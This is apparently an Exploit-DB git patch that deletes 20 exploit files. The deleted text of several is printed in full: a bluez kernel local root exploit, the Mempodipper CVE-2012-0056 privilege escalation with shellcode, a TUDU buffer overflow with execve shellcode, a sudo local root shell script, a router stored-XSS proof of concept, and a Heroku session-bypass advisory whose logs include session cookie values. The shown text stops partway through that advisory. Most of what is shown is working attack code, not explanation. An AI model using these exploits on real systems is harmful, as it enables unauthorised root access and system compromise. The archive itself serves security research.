From 3ef2faa870f372ce170520d6ceb03d21ed8f138b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 13 May 2016 11:12:47 +0000 Subject: [PATCH] DB: 2016-05-13 --- platforms/hardware/webapps/37005.txt | 44 --- platforms/linux/local/25290.c | 269 ----------------- platforms/linux/local/35161.txt | 291 ------------------ platforms/linux/local/38686.py | 48 --- platforms/multiple/local/11651.txt | 25 -- platforms/multiple/webapps/37256.txt | 434 --------------------------- platforms/php/webapps/31738.txt | 93 ------ platforms/php/webapps/36025.txt | 66 ---- platforms/php/webapps/36039.txt | 13 - platforms/php/webapps/37529.txt | 43 --- platforms/php/webapps/38690.html | 19 -- platforms/windows/local/36555.c | 265 ---------------- platforms/windows/local/36556.c | 29 -- platforms/windows/local/36557.txt | 20 -- platforms/windows/local/36558.txt | 20 -- platforms/windows/local/36700.txt | 22 -- platforms/windows/local/38542.cpp | 205 ------------- platforms/windows/remote/20676.rb | 195 ------------ platforms/windows/remote/35426.pl | 109 ------- platforms/windows/remote/35841.txt | 31 -- 20 files changed, 2241 deletions(-) delete mode 100755 platforms/hardware/webapps/37005.txt delete mode 100755 platforms/linux/local/25290.c delete mode 100755 platforms/linux/local/35161.txt delete mode 100755 platforms/linux/local/38686.py delete mode 100755 platforms/multiple/local/11651.txt delete mode 100755 platforms/multiple/webapps/37256.txt delete mode 100755 platforms/php/webapps/31738.txt delete mode 100755 platforms/php/webapps/36025.txt delete mode 100755 platforms/php/webapps/36039.txt delete mode 100755 platforms/php/webapps/37529.txt delete mode 100755 platforms/php/webapps/38690.html delete mode 100755 platforms/windows/local/36555.c delete mode 100755 platforms/windows/local/36556.c delete mode 100755 platforms/windows/local/36557.txt delete mode 100755 platforms/windows/local/36558.txt delete mode 100755 platforms/windows/local/36700.txt delete mode 100755 platforms/windows/local/38542.cpp delete mode 100755 platforms/windows/remote/20676.rb delete mode 100755 platforms/windows/remote/35426.pl delete mode 100755 platforms/windows/remote/35841.txt diff --git a/platforms/hardware/webapps/37005.txt b/platforms/hardware/webapps/37005.txt deleted file mode 100755 index b6b4017b4..000000000 --- a/platforms/hardware/webapps/37005.txt +++ /dev/null @@ -1,44 +0,0 @@ -# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel) -Stored XSS -# Google Dork: N/A -# Date: 13/05/2015 -# Exploit Author: Xodiak xodiak.blackhat@gmail.com -# Vendor Homepage: http://iplink.com.tw -# Software Link: N/A -# Version: All Version -# Tested on: Kali Linux -# CVE : N/A -# -Interductions: -A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered. - -If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable -Firewall ,Hijack Bowser By Beef And,etc.. - -This Can Harm System And Modem :) - -POC: -http://192.168.1.1/url_nokeyword.htm - -GET /url_nokeyword.htm HTTP/1.1 -Host: 192.168.1.1 -User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 -Firefox/18.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://192.168.1.1/code.htm -Authorization: Basic YWRtaW46YWRtaW4= -Connection: keep-alive - -HTTP/1.1 200 OK -Server: Virtual Web 0.9 -Content-Length: 2690 - - - -=================== -Greetz : -=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza -Attacker,MMA Defacer,END3R -Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-= diff --git a/platforms/linux/local/25290.c b/platforms/linux/local/25290.c deleted file mode 100755 index 248249f49..000000000 --- a/platforms/linux/local/25290.c +++ /dev/null @@ -1,269 +0,0 @@ -/* -source: http://www.securityfocus.com/bid/12911/info - -A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. - -A local attacker may leverage this issue to gain escalated privileges on an affected computer. -*/ - -/* - -Due to many responses i've improved the exploit -to cover more systems! - - - ONG_BAK v0.9 [october 24th 05] -"""""""""""""""""""""""""""""""""""" -o universal "shellcode" added -o try to use all possible memory regions -o bugfixes - -qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222 --|-bluez local root exploit v.0.9 -by qobaiashi- - | - |- i've found kernel 2.6.11.4-20a-default - |- trampoline is at 0x804869c - |- trying... - |- [ecx: bf8d0000 ] - |- suitable value found!using 0xbf8d0000 - |- the time has come to push the button... -sh-3.00# exit - - - - - - - ONG_BAK v0.3 [april 8th 05] -""""""""""""""""""""""""""""""""" -ong_bak now checks the value of ecx and launches -the exploit in case a suitable value has been found! - - - - ONG_BAK v0.1 [april 4th 05] -""""""""""""""""""""""""""""""""" - -local root exploit for the bluetooth bug - -usage: - -the bug is quite stable so you can't realy fuck things up -if you stick to the following: - -play around with the negative argument until ecx points to -our data segment: - - -qobaiashi@voyager:~> ./ong_bak -1002341 --|-local bluez exploit v.0.3 -by qobaiashi- - | - |- i've found kernel 2.6.4-52-default - |- trying... - |- [ecx: 0b8f0f0f ] -qobaiashi@voyager:~> ./ong_bak -10023411 --|-local bluez exploit v.0.3 -by qobaiashi- - | - |- i've found kernel 2.6.4-52-default - |- trying... - |- [ecx: 0809da40 ] - |- suitable value found!using 0x0809da40 - |- the time has come to push the button.. -qobaiashi@voyager:~> id -uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) -qobaiashi@voyager:~> - - - -that's it. -unfortunately it's not yet very practicable.. - -qobaiashi@u-n-f.com - -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -void usage(char *path); - -//===================[ kernel 2.6* privilege elevator ]=============================== -//===================[ qobaiashi@u-n-f.com ]=============================== -//globals -int uid, gid; - -extern load_highlevel; -__asm__ -( -"load_highlevel: \n" -"xor %eax, %eax \n" -"mov $0xffffe000, %eax\n" -"and %esp,%eax \n" -"pushl %eax \n" -"call set_root \n" -"pop %eax \n" -//ret to userspace-2.6.* version -" cli \n" -" pushl $0x7b \n" //DS user selector -" pop %ds \n" -" pushl %ds \n" //SS -" pushl $0xc0000000 \n" //ESP -" pushl $0x246 \n" //EFLAGS -" pushl $0x73 \n" //CS user selector -" pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!! -"iret \n" -); - -void set_root(unsigned int *ts) -{ -ts = (int*)*ts; -int cntr; -//hope you guys are int aligned -for(cntr = 0; cntr <= 512; cntr++, ts++) - if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid) - ts[0] = ts[1] = ts[4] = ts[5] = 0; - -} - - -void shellcode() -{ -system("/bin/sh"); -exit(0); -} -//==================================================================================== -//==================================================================================== - - - - - -main(int argc, char *argv[]) -{ -char buf[2048]; -int sock, *mod = (int*)buf; -int *linker = 0; - -unsigned int arg; -int tmp; -char *check; -struct utsname vers; - -gid = getgid(); -uid = getuid(); - -printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n"); -if (uname(&vers) < 0) - printf(" |- couldn't determine kernel version\n"); - -else - printf(" |- i've found kernel %s\n", vers.release); - - -printf(" |- trampoline is at %p\n", &load_highlevel); - - -if (argc < 2) - { - usage(argv[0]); - exit(1); - } - -if (argc == 2) - arg = strtoul(argv[1], 0, 0); - - -if (fork() != 0)//parent watch the Oops - { - //previous Oops printing - usleep(1000); - if ((tmp = klogctl(0x3, buf, 1700)) > -1) - { - check = strstr(buf, "ecx: "); - printf(" |- [%0.14s]\n", check); - check+=5; - *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; - mod = (unsigned int*)strtoul(check, 0, 0); - //page align FIXME: might be booggy - int *ecx = mod; - mod = (int)mod &~ 0x00000fff; - linker = -mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0); - if(linker == mod)//we could mmap the area - { - printf(" |- suitable value found!using %p\n", mod); - printf(" |- the time has come to push the button... \n"); - for (sock = 0;sock <= 1;sock++) //use ecx - *(ecx++) = (int)&load_highlevel; //link to shellcode - } - - else - { - printf(" |- could not mmap %p\n", mod); - if( brk((void*)mod+0x200 ) == -1) - { - printf(" |- could not brk to %p\n", mod); - printf(" `-------------------------------\n"); - exit(-1); - } - //here we did it - printf(" |- suitable value found!using %p\n", mod); - printf(" |- the time has come to push the button... \n"); - for (sock = 0;sock <= 1;sock++) //use ecx - *(ecx++) = (int)&load_highlevel; //link to shellcode - - } - if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) - exit(1); - - } - return 0; - } - -if (fork() == 0)//child does the pre-exploit -{ - printf(" |- trying...\n"); - if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) - { - printf(" |- something went w0rng (invalid value)\n"); - exit(1); - } -} - -exit(0); -} - - - -/*****************\ -|** usage **| -\*****************/ -void usage(char *path) -{ -printf(" |----------------------------\n"); -printf(" | usage: %s \n", path); -printf(" | tested:\n"); -printf(" | SuSE 9.1: -10023411 \n"); -printf(" | -41122122 \n"); -printf(" | Kernel 2.6.11: -10023 \n"); -printf(" | SuSE 9.3: -100222\n"); -printf(" | -102901\n"); -printf(" `-----------------------\n"); -exit(0); -} - -// 1st post: milw0rm.com [2005-04-09] - -// milw0rm.com [2005-10-26] - - - diff --git a/platforms/linux/local/35161.txt b/platforms/linux/local/35161.txt deleted file mode 100755 index e9e924e29..000000000 --- a/platforms/linux/local/35161.txt +++ /dev/null @@ -1,291 +0,0 @@ -/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c -Blog post about it is here: http://blog.zx2c4.com/749 -*/ - -/* - * Mempodipper - * by zx2c4 - * - * Linux Local Root Exploit - * - * Rather than put my write up here, per usual, this time I've put it - * in a rather lengthy blog post: http://blog.zx2c4.com/749 - * - * Enjoy. - * - * - zx2c4 - * Jan 21, 2012 - * - * CVE-2012-0056 - */ - -#define _LARGEFILE64_SOURCE -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -char *prog_name; - -int send_fd(int sock, int fd) -{ - char buf[1]; - struct iovec iov; - struct msghdr msg; - struct cmsghdr *cmsg; - int n; - char cms[CMSG_SPACE(sizeof(int))]; - - buf[0] = 0; - iov.iov_base = buf; - iov.iov_len = 1; - - memset(&msg, 0, sizeof msg); - msg.msg_iov = &iov; - msg.msg_iovlen = 1; - msg.msg_control = (caddr_t)cms; - msg.msg_controllen = CMSG_LEN(sizeof(int)); - - cmsg = CMSG_FIRSTHDR(&msg); - cmsg->cmsg_len = CMSG_LEN(sizeof(int)); - cmsg->cmsg_level = SOL_SOCKET; - cmsg->cmsg_type = SCM_RIGHTS; - memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); - - if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) - return -1; - close(sock); - return 0; -} - -int recv_fd(int sock) -{ - int n; - int fd; - char buf[1]; - struct iovec iov; - struct msghdr msg; - struct cmsghdr *cmsg; - char cms[CMSG_SPACE(sizeof(int))]; - - iov.iov_base = buf; - iov.iov_len = 1; - - memset(&msg, 0, sizeof msg); - msg.msg_name = 0; - msg.msg_namelen = 0; - msg.msg_iov = &iov; - msg.msg_iovlen = 1; - - msg.msg_control = (caddr_t)cms; - msg.msg_controllen = sizeof cms; - - if ((n = recvmsg(sock, &msg, 0)) < 0) - return -1; - if (n == 0) - return -1; - cmsg = CMSG_FIRSTHDR(&msg); - memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); - close(sock); - return fd; -} - -unsigned long ptrace_address() -{ - int fd[2]; - printf("[+] Creating ptrace pipe.\n"); - pipe(fd); - fcntl(fd[0], F_SETFL, O_NONBLOCK); - - printf("[+] Forking ptrace child.\n"); - int child = fork(); - if (child) { - close(fd[1]); - char buf; - printf("[+] Waiting for ptraced child to give output on syscalls.\n"); - for (;;) { - wait(NULL); - if (read(fd[0], &buf, 1) > 0) - break; - ptrace(PTRACE_SYSCALL, child, NULL, NULL); - } - - printf("[+] Error message written. Single stepping to find address.\n"); - struct user_regs_struct regs; - for (;;) { - ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); - wait(NULL); - ptrace(PTRACE_GETREGS, child, NULL, ®s); -#if defined(__i386__) -#define instruction_pointer regs.eip -#define upper_bound 0xb0000000 -#elif defined(__x86_64__) -#define instruction_pointer regs.rip -#define upper_bound 0x700000000000 -#else -#error "That platform is not supported." -#endif - if (instruction_pointer < upper_bound) { - unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); - if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) - return instruction_pointer; - } - } - } else { - printf("[+] Ptrace_traceme'ing process.\n"); - if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { - perror("[-] ptrace"); - return 0; - } - close(fd[0]); - dup2(fd[1], 2); - execl("/bin/su", "su", "not-a-valid-user", NULL); - } - return 0; -} - -unsigned long objdump_address() -{ - FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); - if (!command) { - perror("[-] popen"); - return 0; - } - char result[32]; - fgets(result, 32, command); - pclose(command); - return strtoul(result, NULL, 16); -} - -unsigned long find_address() -{ - printf("[+] Ptracing su to find next instruction without reading binary.\n"); - unsigned long address = ptrace_address(); - if (!address) { - printf("[-] Ptrace failed.\n"); - printf("[+] Reading su binary with objdump to find exit@plt.\n"); - address = objdump_address(); - if (address == ULONG_MAX || !address) { - printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); - printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); - exit(-1); - } - } - printf("[+] Resolved call address to 0x%lx.\n", address); - return address; -} - -int su_padding() -{ - printf("[+] Calculating su padding.\n"); - FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); - if (!command) { - perror("[-] popen"); - exit(1); - } - char result[256]; - fgets(result, 256, command); - pclose(command); - return strstr(result, "this-user-does-not-exist") - result; -} - -int child(int sock) -{ - char parent_mem[256]; - sprintf(parent_mem, "/proc/%d/mem", getppid()); - printf("[+] Opening parent mem %s in child.\n", parent_mem); - int fd = open(parent_mem, O_RDWR); - if (fd < 0) { - perror("[-] open"); - return 1; - } - printf("[+] Sending fd %d to parent.\n", fd); - send_fd(sock, fd); - return 0; -} - -int parent(unsigned long address) -{ - int sockets[2]; - printf("[+] Opening socketpair.\n"); - if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { - perror("[-] socketpair"); - return 1; - } - if (fork()) { - printf("[+] Waiting for transferred fd in parent.\n"); - int fd = recv_fd(sockets[1]); - printf("[+] Received fd at %d.\n", fd); - if (fd < 0) { - perror("[-] recv_fd"); - return 1; - } - printf("[+] Assigning fd %d to stderr.\n", fd); - dup2(2, 15); - dup2(fd, 2); - - unsigned long offset = address - su_padding(); - printf("[+] Seeking to offset 0x%lx.\n", offset); - lseek64(fd, offset, SEEK_SET); - -#if defined(__i386__) - // See shellcode-32.s in this package for the source. - char shellcode[] = - "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" - "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" - "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" - "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" - "\x80"; -#elif defined(__x86_64__) - // See shellcode-64.s in this package for the source. - char shellcode[] = - "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" - "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" - "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" - "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" - "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; -#else -#error "That platform is not supported." -#endif - printf("[+] Executing su with shellcode.\n"); - execl("/bin/su", "su", shellcode, NULL); - } else { - char sock[32]; - sprintf(sock, "%d", sockets[0]); - printf("[+] Executing child from child fork.\n"); - execl("/proc/self/exe", prog_name, "-c", sock, NULL); - } - return 0; -} - -int main(int argc, char **argv) -{ - prog_name = argv[0]; - - if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') - return child(atoi(argv[2])); - - printf("===============================\n"); - printf("= Mempodipper =\n"); - printf("= by zx2c4 =\n"); - printf("= Jan 21, 2012 =\n"); - printf("===============================\n\n"); - - if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') - return parent(strtoul(argv[2], NULL, 16)); - else - return parent(find_address()); - -} \ No newline at end of file diff --git a/platforms/linux/local/38686.py b/platforms/linux/local/38686.py deleted file mode 100755 index ce34c8bb4..000000000 --- a/platforms/linux/local/38686.py +++ /dev/null @@ -1,48 +0,0 @@ -# Exploit Author: Juan Sacco - http://www.exploitpack.com -# Program: tudu - Command line hierarchical ToDo list -# Tested on: GNU/Linux - Kali Linux 2.0 x86 -# -# Description: TUDU v0.82 and prior is prone to a stack-based buffer overflow -# vulnerability because the application fails to perform adequate -# boundary-checks on user-supplied input. -# -# An attacker could exploit this issue to execute arbitrary code in the -# context of the application. Failed exploit attempts will result in a -# denial-of-service condition. -# -# Vendor homepage: http://www.cauterized.net/~meskio/tudu -# Kali Linux 2.0 package: pool/main/t/tudu/tudu_0.8.2-1.deb -# MD5: 1dc2s2e9c374c9876b2b02283a9f5243 - -import os,subprocess -def run(): - try: - print "# TUDU v0.82 Stack-Based Overflow by Juan Sacco" - print "# It's Fuzzing time on unusable exploits" - print "# This exploit is for educational purposes only" - # Basic structure: JUNK + SHELLCODE + NOPS + EIP - - junk = "\x41"*10 - shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" - nops = "\x90"*124 - eip = "\x60\xd3\xff\xbf" - subprocess.call(["tack",' ', junk + shellcode + nops + eip]) - - except OSError as e: - if e.errno == os.errno.ENOENT: - print "TUDU not found!" - else: - print "Error executing exploit" - raise - -def howtousage(): - print "Sorry, something went wrong" - sys.exit(-1) - -if __name__ == '__main__': - try: - print "Exploit TUDU 0.82 Local Overflow Exploit" - print "Author: Juan Sacco" - except IndexError: - howtousage() -run() diff --git a/platforms/multiple/local/11651.txt b/platforms/multiple/local/11651.txt deleted file mode 100755 index 3649f5ea7..000000000 --- a/platforms/multiple/local/11651.txt +++ /dev/null @@ -1,25 +0,0 @@ -#!/bin/sh -# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 -# local root exploit -# March 2010 -# automated by kingcope -# Full Credits to Slouching -echo Tod Miller Sudo local root exploit -echo by Slouching -echo automated by kingcope -if [ $# != 1 ] -then -echo "usage: ./sudoxpl.sh " -exit -fi -cd /tmp -cat > sudoedit << _EOF -#!/bin/sh -echo ALEX-ALEX -su -/bin/su -/usr/bin/su -_EOF -chmod a+x ./sudoedit -sudo ./sudoedit $1 - diff --git a/platforms/multiple/webapps/37256.txt b/platforms/multiple/webapps/37256.txt deleted file mode 100755 index 7f7685b41..000000000 --- a/platforms/multiple/webapps/37256.txt +++ /dev/null @@ -1,434 +0,0 @@ -Document Title: -=============== -Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability - - -References (Source): -==================== -http://www.vulnerability-lab.com/get_content.php?id=1323 - -Video: http://www.vulnerability-lab.com/get_content.php?id=1336 - -Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability - - -Release Date: -============= -2015-06-09 - - -Vulnerability Laboratory ID (VL-ID): -==================================== -1323 - - -Common Vulnerability Scoring System: -==================================== -6.1 - - -Product & Service Introduction: -=============================== -Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. -Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers -without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and -designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. -Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. - -Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service -lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. -Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. - -(Copy of the Vendor Homepage: https://www.heroku.com/home ) - - -Abstract Advisory Information: -============================== -The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. - - -Vulnerability Disclosure Timeline: -================================== -2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) -2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) -2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) -2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) -2015-06-09: Public Disclosure (Vulnerability Laboratory) - - -Discovery Status: -================= -Published - - -Affected Product(s): -==================== -Heroku -Product: Heroku Dashboard - Web Application (API) 2014 Q3 - - -Exploitation Technique: -======================= -Remote - - -Severity Level: -=============== -High - - -Technical Details & Description: -================================ -An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. -The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. - -The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. -The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main -heroku web-service the user will be forced to login again. - -During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. -If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the -security mechanism to add or request the database name. - -The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized -access after a session has been expired during the usage of the heroku service. - -The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. -Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation -of the vulnerability results in the evade and bypass of the re-authentication mechanism. - - -Proof of Concept (PoC): -======================= -The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or -by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce -the security vulnerability follow the provided information and steps below to continue. - -Manual steps to reproduce the re-auth bypass vulnerability ... - -1. Register a webpage account at the official heroku website -2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired -3. When the session is expired to do not press the re-auth function button that popup stable to all service -4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites -Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization -5. Successful reproduce of the session vulnerability! - -Video Demonstration -The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. -The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. - - -Exception Message: --Your session has expired ---Your current session has expired or become inactive and has been terminated. ----Please log in again to continue using Dashboard. - - ---- PoC Session Logs --- -17:55:32.218[718ms][total 718ms] Status: 303[See Other] -GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[id.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://www.heroku.com/home] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] - Connection[keep-alive] - Response Header: - Server[Cowboy] - Date[Sat, 20 Sep 2014 15:55:42 GMT] - Connection[keep-alive] - Strict-Transport-Security[max-age=31536000] - X-Frame-Options[SAMEORIGIN] - X-XSS-Protection[1; mode=block] - x-content-type-options[nosniff] - Content-Type[text/html;charset=utf-8] - Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] - Location[https://id.heroku.com/login] - Vary[Accept-Encoding] - Content-Encoding[gzip] - Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10] - Transfer-Encoding[chunked] - Via[1.1 vegur] - - -17:55:32.937[159ms][total 818ms] Status: 200[OK] -GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[id.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://www.heroku.com/home] - 